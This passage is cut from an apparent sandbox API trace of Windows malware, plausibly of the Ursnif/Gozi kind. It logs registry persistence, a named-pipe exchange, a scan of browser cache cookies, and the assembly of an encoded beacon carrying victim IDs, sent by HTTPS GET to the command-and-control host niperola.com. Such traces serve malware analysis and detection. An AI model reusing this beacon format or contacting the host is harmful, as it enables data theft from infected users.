lpData=0x74f6ba0*, cbData=0x28 | out: lpData=0x74f6ba0*) returned 0x0 [0249.124] RegCloseKey (hKey=0x958) returned 0x0 [0249.124] CallNamedPipeA (in: lpNamedPipeName="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}", lpInBuffer=0x7aaff80, nInBufferSize=0xc, lpOutBuffer=0x7c3f7c0, nOutBufferSize=0xc, lpBytesRead=0x7c3f810, nTimeOut=0x1 | out: lpOutBuffer=0x7c3f7c0, lpBytesRead=0x7c3f810) returned 1 [0249.127] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f7d8 | out: phkResult=0x7c3f7d8*=0x1598) returned 0x0 [0249.127] RegSetValueExA (in: hKey=0x1598, lpValueName="Client", Reserved=0x0, dwType=0x3, lpData=0x74f6ba0*, cbData=0x28 | out: lpData=0x74f6ba0*) returned 0x0 [0249.127] RegCloseKey (hKey=0x1598) returned 0x0 [0249.127] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Run", phkResult=0x7c3f740 | out: phkResult=0x7c3f740*=0x0) returned 0x2 [0249.127] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1598 [0249.127] RegCreateKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f898 | out: phkResult=0x7c3f898*=0x958) returned 0x0 [0249.127] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegNotifyChangeKeyValue") returned 0x7ff976f98fd0 [0249.128] RegNotifyChangeKeyValue (hKey=0x958, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x1598, fAsynchronous=1) returned 0x0 [0249.128] WaitForMultipleObjects (nCount=0x4, lpHandles=0x7c3f8a0*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0249.128] WaitForSingleObject (hHandle=0x139c, dwMilliseconds=0x0) returned 0x102 [0249.128] WaitForSingleObject (hHandle=0x1894, dwMilliseconds=0x0) returned 0x0 [0249.128] WaitForSingleObject (hHandle=0x188c, dwMilliseconds=0x0) returned 0x0 [0249.128] SetWaitableTimer (hTimer=0x1894, lpDueTime=0x7c3f938, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0249.128] SwitchToThread () returned 1 [0249.405] ReleaseMutex (hMutex=0x188c) returned 1 [0249.405] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f7b8 | out: phkResult=0x7c3f7b8*=0x934) returned 0x0 [0249.405] RegQueryValueExA (in: hKey=0x934, lpValueName="LastTask", lpReserved=0x0, lpType=0x7c3f740, lpData=0x0, lpcbData=0x7c3f808*=0x1 | out: lpType=0x7c3f740*=0x0, lpData=0x0, lpcbData=0x7c3f808*=0x0) returned 0x2 [0249.405] RegCloseKey (hKey=0x934) returned 0x0 [0249.405] CreateFileA (lpFileName="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}" (normalized: "\\device\\namedpipe\\{072bb6f5-baec-d114-fc2b-8e95f08fa299}"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x40000000, hTemplateFile=0x0) returned 0x920 [0249.406] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x924 [0249.406] WriteFile (in: hFile=0x920, lpBuffer=0x7c3f720*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x7c3f708, lpOverlapped=0x7c3f6c0 | out: lpBuffer=0x7c3f720*, lpNumberOfBytesWritten=0x7c3f708*=0xc, lpOverlapped=0x7c3f6c0) returned 1 [0249.407] CloseHandle (hObject=0x924) returned 1 [0249.407] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x924 [0249.407] ReadFile (in: hFile=0x920, lpBuffer=0x7c3f710, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x7c3f6f8, lpOverlapped=0x7c3f6b0 | out: lpBuffer=0x7c3f710*, lpNumberOfBytesRead=0x7c3f6f8*=0xc, lpOverlapped=0x7c3f6b0) returned 1 [0249.531] CloseHandle (hObject=0x924) returned 1 [0249.531] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x924 [0249.531] ReadFile (in: hFile=0x920, lpBuffer=0x79c54a0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x7c3f6f8, lpOverlapped=0x7c3f6b0 | out: lpBuffer=0x79c54a0, lpNumberOfBytesRead=0x7c3f6f8*=0x0, lpOverlapped=0x7c3f6b0) returned 0 [0249.531] GetLastError () returned 0xe9 [0249.531] CloseHandle (hObject=0x924) returned 1 [0249.531] CloseHandle (hObject=0x920) returned 1 [0249.541] GetTickCount () returned 0x24ec2 [0249.541] wsprintfA (in: param_1=0x79b1bc0, param_2="soft=1&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x&guid=%08x%08x%08x%08x" | out: param_1="soft=1&version=300018&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&crc=114f742&guid=48b8f0f31f41d614be13f8bf91182f41") returned 127 [0249.541] lstrlenA (lpString="niperola.com") returned 12 [0249.542] GetTickCount () returned 0x24ec2 [0249.542] lstrlenA (lpString="%s=%s&") returned 6 [0249.542] sprintf (in: _Dest=0x79b23d0, _Format="%s=%s&" | out: _Dest="tfjd=wweruw&") returned 12 [0249.542] lstrlenA (lpString="tfjd=wweruw&") returned 12 [0249.542] lstrlenA (lpString="soft=1&version=300018&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&crc=114f742&guid=48b8f0f31f41d614be13f8bf91182f41") returned 127 [0249.542] strcpy (in: _Dest=0x79c6760, _Source="tfjd=wweruw&" | out: _Dest="tfjd=wweruw&") returned="tfjd=wweruw&" [0249.542] lstrcatA (in: lpString1="tfjd=wweruw&", lpString2="soft=1&version=300018&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&crc=114f742&guid=48b8f0f31f41d614be13f8bf91182f41" | out: lpString1="tfjd=wweruw&soft=1&version=300018&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&crc=114f742&guid=48b8f0f31f41d614be13f8bf91182f41") returned="tfjd=wweruw&soft=1&version=300018&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&crc=114f742&guid=48b8f0f31f41d614be13f8bf91182f41" [0249.542] lstrlenA (lpString="tfjd=wweruw&soft=1&version=300018&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&crc=114f742&guid=48b8f0f31f41d614be13f8bf91182f41") returned 139 [0249.542] StrTrimA (in: psz="t6PwZYW0cwkgo0TWfMQHPzKoEhmhJLv8xMTE7Bjb36yiIg6baAjQrmWmCuoaAKJTAh4aj/dUbObIyhntoBDPBWCqqthMV/i6S58Tlr8/c9EnJI0JJFxlEUO4PkOIv1mxmKqNdu6KajDSE8RmL8TP2Um0tgLQM0Jq4I5r7+BO0SxznfuPly89dHTrGOJp3FDd\n\r", pszTrimChars="\r\n=" | out: psz="t6PwZYW0cwkgo0TWfMQHPzKoEhmhJLv8xMTE7Bjb36yiIg6baAjQrmWmCuoaAKJTAh4aj/dUbObIyhntoBDPBWCqqthMV/i6S58Tlr8/c9EnJI0JJFxlEUO4PkOIv1mxmKqNdu6KajDSE8RmL8TP2Um0tgLQM0Jq4I5r7+BO0SxznfuPly89dHTrGOJp3FDd") returned 1 [0249.542] lstrlenA (lpString="t6PwZYW0cwkgo0TWfMQHPzKoEhmhJLv8xMTE7Bjb36yiIg6baAjQrmWmCuoaAKJTAh4aj/dUbObIyhntoBDPBWCqqthMV/i6S58Tlr8/c9EnJI0JJFxlEUO4PkOIv1mxmKqNdu6KajDSE8RmL8TP2Um0tgLQM0Jq4I5r7+BO0SxznfuPly89dHTrGOJp3FDd") returned 192 [0249.542] _snprintf (in: _Dest=0x79c6ab5, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0249.542] _snprintf (in: _Dest=0x79c6acf, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0249.542] _snprintf (in: _Dest=0x79c6adb, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0249.542] _snprintf (in: _Dest=0x79c6b1b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0249.542] lstrlenA (lpString="t6PwZYW0cwkgo0TWfMQHPzKoEhmhJLv8xMTE7Bjb36yiIg6baAjQrmWmCuoaAKJTAh4aj_2FdUbObIyhntoBDPBWCqqthMV_2Fi6S58Tlr8_2Fc9EnJI0JJFxlEUO4PkOIv1mxmKqNdu6KajDSE8RmL8TP2Um0tgLQM0Jq4I5r7_2BBO0SxznfuPly89dHTrGOJp3FDd") returned 200 [0249.554] StrTrimA (in: psz="t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd", pszTrimChars="\r\n" | out: psz="t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd") returned 0 [0249.554] lstrlenA (lpString="/images/") returned 8 [0249.554] lstrlenA (lpString="t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd") returned 213 [0249.557] lstrcpyA (in: lpString1=0x79c6850, lpString2="/images/" | out: lpString1="/images/") returned="/images/" [0249.557] lstrcatA (in: lpString1="/images/", lpString2="t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd" | out: lpString1="/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd") returned="/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd" [0249.557] lstrcpyA (in: lpString1=0x79c6760, lpString2=".gif" | out: lpString1=".gif") returned=".gif" [0249.557] lstrcpyA (in: lpString1=0x79c5f50, lpString2="niperola.com" | out: lpString1="niperola.com") returned="niperola.com" [0249.557] lstrcatA (in: lpString1="niperola.com", lpString2="/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd" | out: lpString1="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd") returned="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd" [0249.557] lstrcatA (in: lpString1="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd", lpString2=".gif" | out: lpString1="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif") returned="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif" [0249.557] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x7ff96b080000 [0249.558] GetProcAddress (hModule=0x7ff96b080000, lpProcName="FindFirstUrlCacheEntryA") returned 0x7ff96b132120 [0249.558] FindFirstUrlCacheEntryA (in: lpszUrlSearchPattern=0x0, lpFirstCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8 | out: lpFirstCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8) returned 0x1 [0249.562] StrCmpIW (psz1="CacheLimit", psz2="DelegateExecute") returned -1 [0249.562] RegGetValueW (in: hkey=0x940, lpSubKey=0x0, lpValue="CacheLimit", dwFlags=0x18, pdwType=0x0, pvData=0x7c3f370, pcbData=0x7c3f388*=0x4 | out: pdwType=0x0, pvData=0x7c3f370, pcbData=0x7c3f388*=0x4) returned 0x0 [0249.563] StrCmpIW (psz1="CacheLimit", psz2="DelegateExecute") returned -1 [0249.563] RegGetValueW (in: hkey=0x940, lpSubKey=0x0, lpValue="CacheLimit", dwFlags=0x18, pdwType=0x0, pvData=0x7c3f160, pcbData=0x7c3f178*=0x4 | out: pdwType=0x0, pvData=0x7c3f160, pcbData=0x7c3f178*=0x4) returned 0x0 [0249.564] StrCmpIW (psz1="CacheLimit", psz2="DelegateExecute") returned -1 [0249.564] RegGetValueW (in: hkey=0x940, lpSubKey=0x0, lpValue="CacheLimit", dwFlags=0x18, pdwType=0x0, pvData=0x7c3f160, pcbData=0x7c3f178*=0x4 | out: pdwType=0x0, pvData=0x7c3f160, pcbData=0x7c3f178*=0x4) returned 0x0 [0251.485] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrStrIA") returned 0x7ff97736e1c0 [0251.485] StrStrIA (lpFirst="Cookie:ciihmnxmn6ps@consent.google.de/", lpSrch="niperola.com") returned 0x0 [0251.486] GetProcAddress (hModule=0x7ff96b080000, lpProcName="FindNextUrlCacheEntryA") returned 0x7ff96b107bf0 [0251.486] FindNextUrlCacheEntryA (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8 | out: lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8) returned 1 [0251.486] StrStrIA (lpFirst="Cookie:ciihmnxmn6ps@ssl.microsofttranslator.com/", lpSrch="niperola.com") returned 0x0 [0251.486] FindNextUrlCacheEntryA (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8 | out: lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8) returned 1 [0251.486] StrStrIA (lpFirst="Cookie:ciihmnxmn6ps@microsoft.com/", lpSrch="niperola.com") returned 0x0 [0251.486] FindNextUrlCacheEntryA (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8 | out: lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8) returned 1 [0251.486] StrStrIA (lpFirst="Cookie:ciihmnxmn6ps@ieonline.microsoft.com/", lpSrch="niperola.com") returned 0x0 [0251.486] FindNextUrlCacheEntryA (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8 | out: lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8) returned 1 [0251.486] StrStrIA (lpFirst="Cookie:ciihmnxmn6ps@google.com/", lpSrch="niperola.com") returned 0x0 [0251.486] FindNextUrlCacheEntryA (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8 | out: lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8) returned 1 [0251.486] StrStrIA (lpFirst="Cookie:ciihmnxmn6ps@ssl-api.bing.com/", lpSrch="niperola.com") returned 0x0 [0251.486] FindNextUrlCacheEntryA (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8 | out: lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8) returned 1 [0251.486] StrStrIA (lpFirst="Cookie:ciihmnxmn6ps@google.de/", lpSrch="niperola.com") returned 0x0 [0251.486] FindNextUrlCacheEntryA (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8 | out: lpNextCacheEntryInfo=0x79c6940, lpcbCacheEntryInfo=0x7c3f6d8) returned 0 [0251.690] GetProcAddress (hModule=0x7ff96b080000, lpProcName="FindCloseUrlCache") returned 0x7ff96b0d2470 [0251.690] FindCloseUrlCache (hEnumHandle=0x1) returned 1 [0251.690] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x930 [0251.690] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0c [0251.690] lstrlenA (lpString="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif") returned 237 [0251.690] lstrcpyA (in: lpString1=0x7aae530, lpString2="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif" | out: lpString1="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif") returned="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif" [0251.690] StrChrA (lpStart="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif", wMatch=0x2f) returned="/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif" [0251.690] StrChrA (lpStart="niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif", wMatch=0x3f) returned 0x0 [0251.690] lstrlenA (lpString="/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif") returned 225 [0251.691] GetProcAddress (hModule=0x7ff96b080000, lpProcName="InternetCanonicalizeUrlA") returned 0x7ff96b1a71b0 [0251.691] InternetCanonicalizeUrlA (in: lpszUrl="/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif", lpszBuffer=0x7aaecd0, lpdwBufferLength=0x7c3f610, dwFlags=0x0 | out: lpszBuffer="/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif", lpdwBufferLength=0x7c3f610) returned 1 [0251.692] GetProcAddress (hModule=0x7ff96b080000, lpProcName="InternetOpenA") returned 0x7ff96b0a1400 [0251.692] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0251.693] StrCmpIW (psz1="explorer.exe", psz2="DelegateExecute") returned 1 [0251.693] RegGetValueW (in: hkey=0x13a8, lpSubKey=0x0, lpValue="explorer.exe", dwFlags=0x10, pdwType=0x0, pvData=0x7c3f264, pcbData=0x7c3f260*=0x4 | out: pdwType=0x0, pvData=0x7c3f264, pcbData=0x7c3f260*=0x4) returned 0x2 [0251.693] StrCmpIW (psz1="*", psz2="DelegateExecute") returned -1 [0251.693] RegGetValueW (in: hkey=0x13a8, lpSubKey=0x0, lpValue="*", dwFlags=0x10, pdwType=0x0, pvData=0x7c3f264, pcbData=0x7c3f260*=0x4 | out: pdwType=0x0, pvData=0x7c3f264, pcbData=0x7c3f260*=0x4) returned 0x2 [0251.693] StrCmpIW (psz1="explorer.exe", psz2="DelegateExecute") returned 1 [0251.693] RegGetValueW (in: hkey=0x920, lpSubKey=0x0, lpValue="explorer.exe", dwFlags=0x10, pdwType=0x0, pvData=0x7c3f274, pcbData=0x7c3f270*=0x4 | out: pdwType=0x0, pvData=0x7c3f274, pcbData=0x7c3f270*=0x4) returned 0x0 [0251.694] StrCmpIW (psz1="explorer.exe", psz2="DelegateExecute") returned 1 [0251.694] RegGetValueW (in: hkey=0x920, lpSubKey=0x0, lpValue="explorer.exe", dwFlags=0x10, pdwType=0x0, pvData=0x7c3f274, pcbData=0x7c3f270*=0x4 | out: pdwType=0x0, pvData=0x7c3f274, pcbData=0x7c3f270*=0x4) returned 0x2 [0251.694] StrCmpIW (psz1="*", psz2="DelegateExecute") returned -1 [0251.694] RegGetValueW (in: hkey=0x920, lpSubKey=0x0, lpValue="*", dwFlags=0x10, pdwType=0x0, pvData=0x7c3f274, pcbData=0x7c3f270*=0x4 | out: pdwType=0x0, pvData=0x7c3f274, pcbData=0x7c3f270*=0x4) returned 0x2 [0251.776] StrCmpIW (psz1="ProxySettingsPerUser", psz2="DelegateExecute") returned 1 [0251.776] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", lpValue="ProxySettingsPerUser", dwFlags=0x10, pdwType=0x0, pvData=0x7ff96b2d4024, pcbData=0x7c3f3e0*=0x4 | out: pdwType=0x0, pvData=0x7ff96b2d4024, pcbData=0x7c3f3e0*=0x4) returned 0x2 [0251.778] StrCmpIW (psz1="Enable", psz2="DelegateExecute") returned 1 [0251.778] RegGetValueW (in: hkey=0x9e0, lpSubKey=0x0, lpValue="Enable", dwFlags=0x18, pdwType=0x7c3f360, pvData=0x7c3f3a0, pcbData=0x7c3f3a8*=0x4 | out: pdwType=0x7c3f360*=0x0, pvData=0x7c3f3a0, pcbData=0x7c3f3a8*=0x4) returned 0x2 [0251.779] GetProcAddress (hModule=0x7ff96b080000, lpProcName="InternetSetStatusCallback") returned 0x7ff96b1356e0 [0251.779] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x74ada7c) returned 0x0 [0251.779] ResetEvent (hEvent=0x930) returned 1 [0251.779] GetProcAddress (hModule=0x7ff96b080000, lpProcName="InternetConnectA") returned 0x7ff96b1a78f0 [0251.779] InternetConnectA (hInternet=0xcc0004, lpszServerName="niperola.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x7c3f650) returned 0xcc0008 [0251.779] SetEvent (hEvent=0x930) returned 1 [0251.780] GetProcAddress (hModule=0x7ff96b080000, lpProcName="HttpOpenRequestA") returned 0x7ff96b1d30a0 [0251.797] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84c03180, dwContext=0x7c3f650) returned 0xcc000c 